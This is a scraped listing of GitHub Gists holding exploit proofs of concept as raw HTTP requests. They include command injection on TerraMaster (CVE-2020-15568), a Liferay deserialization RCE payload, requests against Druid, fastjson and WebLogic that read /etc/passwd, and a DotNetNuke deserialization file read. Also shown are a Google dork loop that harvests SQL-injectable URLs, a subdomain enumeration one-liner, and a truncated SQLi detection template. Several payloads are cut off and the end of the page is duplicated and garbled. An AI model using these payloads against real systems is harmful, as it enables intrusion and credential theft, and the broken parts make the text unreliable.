PikPikcU pikpikcu

## CVE-2020-15568.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              2 stars
            
          
                pikpikcu
                / CVE-2020-15568.md
            
            
              Created
              February 4, 2021 14:50
            
              
                POC terramaster CVE-2020-15568 
              
          
    STEP 1 extrack /etc/passwd
GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Eout.txt HTTP/1.1
Host: REDACTED:5443
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip

STEP 2 GET output /etc/passwd
GET /include/out.txt HTTP/1.1


## LiferayRCE(CVE-2020-7961).md

      
              1 file
            
          
              6 forks
            
          
              0 comments
            
          
              12 stars
            
          
                pikpikcu
                / LiferayRCE(CVE-2020-7961).md
            
            
              Last active
              September 9, 2022 03:46
            
              
                POC Liferay RCE(CVE-2020-7961)
              
          
    POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63


## CVE-2021-25646.md

      
              1 file
            
          
              5 forks
            
          
              0 comments
            
          
              5 stars
            
          
                pikpikcu
                / CVE-2021-25646.md
            
            
              Last active
              January 10, 2022 12:32
            
              
                CVE-2021-25646
              
          
    POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close


## fastjson.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              4 stars
            
          
                pikpikcu
                / fastjson.md
            
            
              Last active
              November 17, 2021 03:24
            
              
                fastjson rce
              
          
    fastjson ver:1.2.24

POST / HTTP/1.1
Host: REDACTED
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Type: application/json


## CVE-2019-2725.md

      
              1 file
            
          
              2 forks
            
          
              1 comment
            
          
              1 star
            
          
                pikpikcu
                / CVE-2019-2725.md
            
            
              Last active
              February 5, 2021 06:54
            
              
                CVE-2019-2725 weblogic ver:10.3.6 RCE
              
          
    POST Request with burpsuite

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Content-Type: text/xml
SOAPAction: ""
Content-Length: 175816
CMD: cat /etc/passwd
Connection: close


## dork
for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done

## ReadFile.xml
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>

## Subdo
while read sub;do echo "https://dns.google.com/resolve?name=$sub.hackerone.com&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".hackerone.com" | sort -u ; done < wordlists.txt

## Axway SecureTransport 5.x Unauthenticated XXE
				                     _       _
				  _______ _ __ ___  | | ___ | |
				 |_  / _ \ '__/ _ \ | |/ _ \| |
				  / /  __/ | | (_) || | (_) | |
				 /___\___|_|  \___(_)_|\___/|_|
				    	  https://zero.lol
				 	  zero days 4 days


				ATTENTION:

## sqli2.yaml
id: SQLInjection_ERROR

info:
  name: SQLINJECTION Detection
  author: 0x240x23elu & OFJAAAH
  severity: High

requests:
  - method: GET
	_ _
	_______ _ __ ___ \| \| ___ \| \|
	\|_ / _ \ '__/ _ \ \| \|/ _ \\| \|
	/ / __/ \| \| (_) \|\| \| (_) \| \|
	/___\___\|_\| \___(_)_\|\___/\|_\|
	https://zero.lol
	zero days 4 days


	ATTENTION:
	id: SQLInjection_ERROR

	info:
	name: SQLINJECTION Detection
	author: 0x240x23elu & OFJAAAH
	severity: High

	requests:
	- method: GET